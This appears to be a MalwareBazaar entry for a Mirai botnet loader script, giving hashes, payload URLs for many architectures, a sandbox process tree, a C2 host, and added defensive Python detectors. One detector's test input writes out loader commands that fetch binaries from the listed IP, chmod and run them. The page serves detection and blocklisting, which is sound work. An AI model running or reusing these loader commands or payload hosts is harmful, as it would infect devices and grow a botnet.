MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 9c2c65216f91d93de214d81bdec0dd067e079d81a8fd618c45eef8437e162a1d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai

Vendor detections: 10

SHA256 hash: 9c2c65216f91d93de214d81bdec0dd067e079d81a8fd618c45eef8437e162a1d
SHA3-384 hash: 47d95bf283902424232c92ab0b0fc4a2eb853f7bc0070c6451c81bedef3c11023ef4b9fafd17992c70bc606d19de07b8
SHA1 hash: 688279dad3809e88aceecafdcebbfba7dcd870ae
MD5 hash: c9b559b4a8e1def2037f1c5a8ea0993c
humanhash: video-virginia-texas-freddie
File name: mao_http.sh
Signature: Mirai
File size: 3,211 bytes
First seen: 2026-02-03 09:14:17 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 96:geEUuA1gZW8YKmsKo5MZmzizgSwGMIaMGSweSQ:4Sn
TLSH: T1FF612BFD41A0BF93CC85A94CBA2483A1730B91F5FD72F63C9C584A6A4481B15349BEBD
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1); 30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
IOCs

URL | Malware sample (SHA256 hash) | Signature | Tags
http://185.242.3.127/bins/mao.x86_64 | 80e2ffefac43ba12de92a71d3fb462576c6e13618faf4b1162198410a0f8f953 | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.x86 | 3ae5b43af044c95ac0bdfd11fe1dfe5ef37d8d81b83e478995945d49e54ba029 | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.mips | e40c0cd39b6c1dc46d498c8825377fbd027676188b6f69f6d0536191fc194ae2 | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.mpsl | f419112ecb752170cf2e117417d2b1e3c18c80d14eedee75f7f80c81e68272a5 | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.arm | 80dd7e14890056e8275cd36ec1e86acf6a068d3fa6262faff62b8ba0b5897fa3 | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.arm5 | c9ddb41ae3612864c9cef07da4512ccb04981be9ec81b7f74a96c92cc4f853ab | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.arm6 | 8261d005bbf69978d5d337c1475603aca6a5e81887b484742dd280582ee30495 | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.arm7 | 38a61bd124a9326a536056f65f7512fda68c3b183ebc72371fdc51abc72f2a31 | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.ppc | e756a7caf506a44545930ba42f95500c01128d2d980069cffed3b6811da9e552 | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.m68k | e829fb7b39b54bedb0bc392689ae97e266d7dba40d758b4e57ffecb3ea7fbdb8 | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.sh4 | 7575a248e59f4cc82d111b2098c64ee7cfe04f2b6c29f30972b40adef8c724ed | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.spc | 19ec1515e9e41398425f0d08bab481eb2247046820da8d0bc9a7ad5e8c9cb5aa | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.arc | n/a | n/a | elf mirai ua-wget
http://185.242.3.127/bins/mao.i686 | 231011f653fd0aa0cc0d4a2d89d36919e5b96df96cd73a13dce87af4cfd06b60 | Mirai | elf mirai ua-wget
http://185.242.3.127/bins/mao.i486 | f28646911f9785e1d4dd5c5c78f6034281d92b89f167392e28a1e065c3580538 | Mirai | elf mirai ua-wget

Intelligence


File Origin
# of uploads: 1
# of downloads: 52
Origin country: DE

Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: bash evasive lolbin mirai obfuscated

Verdict: Malicious
File Type: unix shell
Detections: HEUR:Trojan-Downloader.Shell.Agent.a
Status: terminated
Behavior Graph (process tree and network contacts, reconstructed from the graph data):
/usr/bin/sudo (pid 3478)
  execve -> /tmp/sample.bin (pid 3486)
    execve -> /usr/bin/wget (pid 3487): net, send-data, write-file; sends 143 B to 185.242.3.127:80
    execve -> /usr/bin/chmod (pid 3488)
    execve -> /tmp/mao_bot (pid 3489): net; connects to 8.8.8.8:53
    execve -> /usr/bin/curl (pid 3498): net, send-data, write-file; sends 92 B to 185.242.3.127:80
    execve -> /usr/bin/chmod (pid 3522)
    execve -> /tmp/mao_bot (pid 3523): net; connects to 8.8.8.8:53
    execve -> /usr/bin/wget (pid 3532): net, send-data, write-file; sends 140 B to 185.242.3.127:80
    execve -> /usr/bin/chmod (pid 3557)
    execve -> /tmp/mao_bot (pid 3559): net; connects to 8.8.8.8:53
      clone -> /tmp/mao_bot (pid 3560)
      clone -> /tmp/mao_bot (pid 3561): dns, net, send-data, zombie; sends 87 B to 8.8.8.8:53 and 26 B to mn.34509.su:25565
        clone -> /tmp/mao_bot (pid 3563)
        clone -> /tmp/mao_bot (pid 3564): dns, net, send-data; sends 87 B to 8.8.8.8:53 and 26 B to mn.34509.su:25565
Network endpoints: 185.242.3.127:80 (the host serving the mao.* payloads listed under IOCs), 8.8.8.8:53 (DNS), mn.34509.su:25565
Threat name: Script-Shell.Trojan.Vigorf
Status: Malicious
First seen: 2026-02-03 09:17:16 UTC
File Type: Text (Shell)
AV detection: 8 of 36 (22.22%)
Threat level: 5/5

Malware family:
Score: 10/10
Tags: family:mirai antivm botnet defense_evasion discovery linux
Behaviour:
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  - Changes its process name
  - Checks CPU configuration
  - File and Directory Permissions Modification
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Creates a large amount of network flows
  - Mirai
  - Mirai family
Please note that we are no longer able to provide a coverage score for VirusTotal.
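The sandbox graph above shows the same chain three times: a fetcher (wget or curl) launched by /tmp/sample.bin, then chmod, then execution of /tmp/mao_bot, whose forked children talk to 8.8.8.8:53 and to mn.34509.su:25565. As an added example (not code from MalwareBazaar, the sandbox vendor, or the sample), the Python below turns that chain into two host-telemetry detections: a per-parent fetch -> chmod -> execute-from-writable-directory sequence, and outbound connections from a binary that lives in a writable directory to a port other than DNS/HTTP/HTTPS. The Event schema and the EVENTS list are constructed for this example; the pids, image paths and endpoints are copied from the graph, the timestamps are invented.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """One process/network record, a constructed schema for this example."""
    ts: int        # seconds into the run (invented; the graph carries no times)
    pid: int
    ppid: int
    kind: str      # "execve", "clone" or "connect"
    target: str    # image path for execve/clone, "host:port" for connect


@dataclass(frozen=True)
class DropAndRun:
    parent_pid: int
    fetch_pid: int
    chmod_pid: int
    exec_pid: int
    image: str


WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/")
FETCHERS = {"/usr/bin/wget", "/bin/wget", "/usr/bin/curl", "/bin/curl", "/usr/bin/tftp"}
CHMOD_BINS = {"/usr/bin/chmod", "/bin/chmod"}
EXPECTED_PORTS = {53, 80, 443}   # DNS and plain web fetches are not alerted on by themselves


def detect_drop_and_run(events, window=60):
    """For each parent process, flag fetcher -> chmod -> exec-from-writable-dir
    sequences among its direct children, completed within `window` seconds."""
    children = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):      # stable sort keeps record order
        if e.kind == "execve":
            children[e.ppid].append(e)
    alerts = []
    for ppid, execs in children.items():
        fetch = chmod = None
        for e in execs:
            if e.target in FETCHERS:
                fetch, chmod = e, None                 # a new fetch restarts the chain
            elif e.target in CHMOD_BINS and fetch is not None:
                chmod = e
            elif (e.target.startswith(WRITABLE_DIRS) and fetch is not None
                  and chmod is not None and e.ts - fetch.ts <= window):
                alerts.append(DropAndRun(ppid, fetch.pid, chmod.pid, e.pid, e.target))
                fetch = chmod = None
    return alerts


def suspicious_outbound(events):
    """Connections from a process whose image lives in a writable directory to a
    port outside EXPECTED_PORTS. clone() children inherit the parent's image."""
    image_of = {}
    hits = []
    for e in sorted(events, key=lambda e: e.ts):
        if e.kind in ("execve", "clone"):
            image_of[e.pid] = e.target
        elif e.kind == "connect":
            port = int(e.target.rpartition(":")[2])
            if image_of.get(e.pid, "").startswith(WRITABLE_DIRS) and port not in EXPECTED_PORTS:
                hits.append((e.pid, e.target))
    return hits


# Constructed event stream mirroring the behavior graph above (pids and endpoints
# from the graph, timestamps invented).
EVENTS = [
    Event(0, 3486, 3478, "execve", "/tmp/sample.bin"),
    Event(1, 3487, 3486, "execve", "/usr/bin/wget"),
    Event(1, 3487, 3486, "connect", "185.242.3.127:80"),
    Event(2, 3488, 3486, "execve", "/usr/bin/chmod"),
    Event(3, 3489, 3486, "execve", "/tmp/mao_bot"),
    Event(3, 3489, 3486, "connect", "8.8.8.8:53"),
    Event(4, 3498, 3486, "execve", "/usr/bin/curl"),
    Event(4, 3498, 3486, "connect", "185.242.3.127:80"),
    Event(5, 3522, 3486, "execve", "/usr/bin/chmod"),
    Event(6, 3523, 3486, "execve", "/tmp/mao_bot"),
    Event(6, 3523, 3486, "connect", "8.8.8.8:53"),
    Event(7, 3532, 3486, "execve", "/usr/bin/wget"),
    Event(7, 3532, 3486, "connect", "185.242.3.127:80"),
    Event(8, 3557, 3486, "execve", "/usr/bin/chmod"),
    Event(9, 3559, 3486, "execve", "/tmp/mao_bot"),
    Event(10, 3561, 3559, "clone", "/tmp/mao_bot"),
    Event(11, 3561, 3559, "connect", "8.8.8.8:53"),
    Event(11, 3561, 3559, "connect", "mn.34509.su:25565"),
    Event(12, 3564, 3561, "clone", "/tmp/mao_bot"),
    Event(13, 3564, 3561, "connect", "mn.34509.su:25565"),
]

if __name__ == "__main__":
    for a in detect_drop_and_run(EVENTS):
        print("drop-and-run:", a)
    for pid, dst in suspicious_outbound(EVENTS):
        print("suspicious outbound: pid %d -> %s" % (pid, dst))
```

Run stand-alone, the block reports three drop-and-run chains (exec pids 3489, 3523, 3559) and the two connections to mn.34509.su:25565 from the forked mao_bot children; the wget/curl contacts to 185.242.3.127:80 and the DNS lookups are not alerted on by themselves. Real auditd or EDR streams carry the same fields (pid, ppid, exe, sockaddr); the 60-second window and the fixed fetcher and chmod path sets are tuning knobs, and a loader that drops via a busybox applet or a tftp binary at another path needs that path added to FETCHERS.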

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
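The rule text itself is not reproduced on this page. As an added example of the technique the description names, and not the YARA rule or any code from the sample, the Python scanner below looks for the same three ingredients in a shell script: downloads whose host is a numeric IP, a chmod that grants execute permission, and execution of the dropped file, counted across distinct architecture suffixes (the same mao.<arch> set the IOC table above lists). It also resolves plain NAME=value assignments before matching, because loaders tagged obfuscated/evasive commonly hide the host in a variable. SAMPLE, SINGLE_ARCH and BENIGN are constructed inputs written for this example; SAMPLE is modelled on the IOC table and is not the real mao_http.sh.

```python
import re
from dataclasses import dataclass, field

# Architecture suffixes used by multi-arch Mirai loaders (the IOC table above lists
# mao.<arch> for each of these).
ARCH_TOKENS = {"x86_64", "x86", "i686", "i486", "mips", "mpsl", "arm", "arm5",
               "arm6", "arm7", "ppc", "m68k", "sh4", "spc", "arc"}

NUMERIC_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/(\S*)")
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)=([^\s;]+)", re.M)   # NAME=value lines
FETCH = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
CHMOD_EXEC = re.compile(r"\bchmod\s+(?:[ugoa]*\+[rwxX]+|[0-7]{3,4})\b")
EXEC_DROPPED = re.compile(r"(?:^|[;&|\s])\./[\w.-]+")       # ./name on the same script


@dataclass
class Findings:
    hosts: set = field(default_factory=set)    # numeric-IP hosts fetched from
    urls: list = field(default_factory=list)   # full fetch URLs, in script order
    archs: set = field(default_factory=set)    # distinct architecture suffixes requested
    chmod_lines: int = 0
    exec_lines: int = 0


def expand_vars(text):
    """Substitute $NAME / ${NAME} with values from NAME=value assignments in the
    same script, so a host hidden behind a variable is still seen as a literal."""
    assigns = dict(ASSIGN.findall(text))

    def repl(m):
        name = m.group(1) or m.group(2)
        return assigns.get(name, m.group(0))   # unknown names are left untouched

    return re.sub(r"\$\{(\w+)\}|\$(\w+)", repl, text)


def scan_loader_script(text):
    f = Findings()
    for line in expand_vars(text).splitlines():
        if FETCH.search(line):
            for m in NUMERIC_IP_URL.finditer(line):
                f.hosts.add(m.group(1))
                f.urls.append(m.group(0))
                filename = m.group(2).rsplit("/", 1)[-1]
                suffix = filename.rsplit(".", 1)[-1]
                if suffix in ARCH_TOKENS:
                    f.archs.add(suffix)
        if CHMOD_EXEC.search(line):
            f.chmod_lines += 1
        if EXEC_DROPPED.search(line):
            f.exec_lines += 1
    return f


def is_multiarch_loader(f, min_archs=3):
    """Technique match: fetch from a numeric IP, chmod, execute the dropped file,
    for at least min_archs architectures. A single-arch fetch-and-run is left alone
    because legitimate provisioning scripts do exactly that."""
    return (bool(f.hosts) and f.chmod_lines > 0 and f.exec_lines > 0
            and len(f.archs) >= min_archs)


# Constructed inputs for this example (not the real mao_http.sh).
SAMPLE = """#!/bin/sh
h=185.242.3.127
cd /tmp || cd /var/run || cd /dev/shm
wget http://$h/bins/mao.x86_64 -O mao_bot; chmod 777 mao_bot; ./mao_bot; rm -f mao_bot
wget http://$h/bins/mao.x86 -O mao_bot; chmod 777 mao_bot; ./mao_bot; rm -f mao_bot
wget http://$h/bins/mao.mips -O mao_bot; chmod 777 mao_bot; ./mao_bot; rm -f mao_bot
curl -s http://185.242.3.127/bins/mao.arm7 -o mao_bot; chmod +x mao_bot; ./mao_bot; rm -f mao_bot
curl -s http://185.242.3.127/bins/mao.sh4 -o mao_bot; chmod +x mao_bot; ./mao_bot; rm -f mao_bot
"""
SINGLE_ARCH = "wget http://10.0.0.5/tool -O tool; chmod +x tool; ./tool\n"
BENIGN = """#!/bin/sh
curl -fsSL https://example.com/tool.tar.gz -o tool.tar.gz
tar xzf tool.tar.gz
./tool/install
"""

if __name__ == "__main__":
    for name, script in (("SAMPLE", SAMPLE), ("SINGLE_ARCH", SINGLE_ARCH), ("BENIGN", BENIGN)):
        f = scan_loader_script(script)
        print(name, "loader" if is_multiarch_loader(f) else "clean",
              sorted(f.hosts), sorted(f.archs), f.chmod_lines, f.exec_lines)
```

The Findings.urls list is blocklist material: for SAMPLE it yields the five http://185.242.3.127/bins/mao.* URLs even though three of them were written with $h. The check is a heuristic with the same blind spots as any string match: a loader that builds the URL with printf/echo piping, base64-decodes itself, or pulls binaries from a hostname rather than a bare IP will not trip it, which is why the sandbox behaviour above (write to /tmp, chmod, execute dropped ELF) is the complementary signal.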

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download (distributed via web download)
Signature: Mirai
File type: sh
SHA256: 9c2c65216f91d93de214d81bdec0dd067e079d81a8fd618c45eef8437e162a1d (this sample)

Comments